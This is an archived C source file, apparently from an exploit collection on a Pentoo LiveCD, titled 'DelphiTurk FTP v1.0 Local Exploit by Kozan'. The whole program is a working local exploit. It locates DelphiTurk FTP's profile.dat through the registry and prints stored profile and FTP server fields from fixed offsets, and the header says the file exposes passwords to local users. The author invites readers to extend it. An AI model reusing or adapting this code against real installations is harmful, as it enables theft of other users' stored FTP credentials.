home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / delphiturk / delphiTurk.c < prev   
Encoding:
C/C++ Source or Header  |  2005-03-04  |  1.7 KB  |  92 lines
  1. /*****************************************************************
  2.  
  3. DelphiTurk FTP v1.0 Local Exploit by Kozan
  4.  
  5. Application: DelphiTurk FTP v1.0
  6. Procuder: Delphiturk.com and Delphikitabi.com
  7. Vulnerable Description: DelphiTurk FTP v1.0 passwords to local users.
  8.  
  9.  
  10. Coded by: Kozan
  11. Web : www.netmagister.com
  12. Web2: www.spyinstructors.com
  13. Mail: kozan[at]netmagister[dot]com
  14.  
  15.  
  16. *****************************************************************/
  17.  
  18. #include <stdio.h>
  19. #include <windows.h>
  20.  
  21.  
  22. HKEY hKey;
  23. #define BUFSIZE 100
  24. char prgfiles[BUFSIZE];
  25. DWORD dwBufLen=BUFSIZE;
  26. LONG lRet;
  27.  
  28.  
  29. char *bilgi_oku(int adres,int uzunluk)
  30. {
  31.  
  32. if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
  33. "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
  34. 0,
  35. KEY_QUERY_VALUE,
  36. &hKey) == ERROR_SUCCESS)
  37. {
  38.  
  39. lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
  40. (LPBYTE) prgfiles, &dwBufLen);
  41.  
  42. if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
  43. RegCloseKey(hKey);
  44. printf("An error occured!");
  45. return 0;
  46. }
  47.  
  48. RegCloseKey(hKey);
  49.  
  50. }else{
  51. printf("An error occured!\n");
  52. exit(1);
  53. }
  54.  
  55. strcat(prgfiles,"\\DelphiTurk\\Delphi T�rk FTP\\profile.dat");
  56.  
  57. int i;
  58. FILE *fp;
  59. char ch[100];
  60. if((fp=fopen(prgfiles,"rb")) == NULL)
  61. {
  62. return "false";
  63. }
  64. fseek(fp,adres,0);
  65. for(i=0;i<uzunluk;i++)
  66. ch[i]=getc(fp);
  67. ch[i]=NULL;
  68. fclose(fp);
  69. return ch;
  70. }
  71.  
  72.  
  73.  
  74. int main()
  75. {
  76.  
  77. printf("\r\n\r\nDelphiTurk FTP v1.0 Local Exploit by Kozan\n");
  78. printf("www.netmagister.com - www.spyinstructors.com\r\n\r\n");
  79. printf("This example exploit only shows the first record.\r\n");
  80. printf("You may improve it freely...\r\n\r\n");
  81. printf("ProfileName : %s\n",bilgi_oku(1,31));
  82. printf("Ftp Server : %s\n",bilgi_oku(32,51));
  83. printf("Ftp Server : %s\n",bilgi_oku(83,51));
  84. printf("Ftp Server : %s\n",bilgi_oku(134,51));
  85.  
  86.  
  87. return 0;
  88.  
  89.  
  90. }
  91.  
  92.